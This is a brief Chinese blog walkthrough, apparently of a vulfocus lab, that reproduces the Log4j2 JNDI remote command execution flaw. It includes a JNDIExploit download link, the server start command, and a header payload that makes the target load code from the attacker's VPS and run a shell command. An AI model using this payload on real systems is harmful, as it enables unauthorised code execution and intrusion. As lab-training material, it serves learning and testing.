vulfocus复现：Log4j2远程命令执行2

1.开启靶机环境并访问

2.使用JNDIExploit.v1.2在自己的vps上开启服务

工具下载：

链接：https://pan.baidu.com/s/1oCfHPw-mMBPDDjNy-RO1YA
提取码：4x5j

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i xx.xx.xx.xx(vps公网IP) -l 1234 -p 2345

3.抓包填写payload，获得flag

payload：

X-Api-Version:${jndi:ldap://xx.xx.xx.xx:1234/TomcatBypass/TomcatEcho}
Content-Type:application/x-www-from-urlencoded
Cmd:ls /tmp

完成

如果可以帮助到你，劳烦点点赞哦！

声明： 本文章仅供学习使用，不得用于未授权的渗透测试，禁止用于非法用途。

vulfocus复现：Log4j2远程命令执行2相关推荐

Log4j2远程命令执行(CVE-2021-44228)复现
漏洞说明 Log4j是Apache的开源日志记录组件.Log4j2是Log4j的升级版本,通过重写Log4j引入了丰富的功能特性.该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息. 由 ...
Log4j2远程命令执行2-vulfocus-wp
vulfocus:log4j2 漏洞的请求头的触发点环境,请求头 X-Api-Version字段 1.首先准备一个vps环境(腾讯云阿里云都可) 在vps上开启ldap环境:(Log4j2-Exp工具 ...
【漏洞复现】ThinkPHP5 5.x 远程命令执行(getshell)
0x00复现环境 ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用(GetShell) 0x01步骤点击start to hack 进入环境页面 run t ...
CVE-2021-22205 Gitlab exiftool远程命令执行复现
1 漏洞信息漏洞名称 Gitlab exiftool远程命令执行漏洞漏洞编号 CVE-2021-22205 危害等级高危 CVSS评分 7.5 漏洞类型中间件漏洞漏洞厂商 GitLab 漏洞 ...
Axis1.4 远程命令执行(CVE-2019-0227)复现
一.漏洞介绍漏洞本质是管理员对AdminService的配置错误.当enableRemoteAdmin属性设置为true时,攻击者可以构造WebService调用freemarker组件中的temp ...
PHPMailer远程命令执行漏洞复现
PHPMailer远程命令执行漏洞复现一.漏洞简介 PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, ...
开源堡垒机JumpServer远程命令执行漏洞复现
声明好好学习,天天向上漏洞描述 JumpServer 是全球首款完全开源的堡垒机, 使用GNU GPL v2.0 开源协议, 是符合4A 的专业运维审计系统.JumpServer 使用Python ...
华为路由器远程命令执行漏洞复现(CVE-2017-17215)
华为路由器远程命令执行漏洞复现(CVE-2017-17215) 漏洞内容这个漏洞算是比较老的一种漏洞了,但是具有一定的学习价值. CheckPoint报告华为HG532路由器产品存在远程命令执行漏洞 ...
Dlink路由器 CNVD-2018-01084 远程命令执行漏洞复现分析
Dlink路由器 CNVD-2018-01084复现分析 0x01 背景介绍 D-Link DIR 615/645/815路由器1.03及之前的固件版本存在远程命令执行漏洞.该漏洞是由于service ...

vulfocus复现：Log4j2远程命令执行2

vulfocus复现：Log4j2远程命令执行2相关推荐

最新文章

热门文章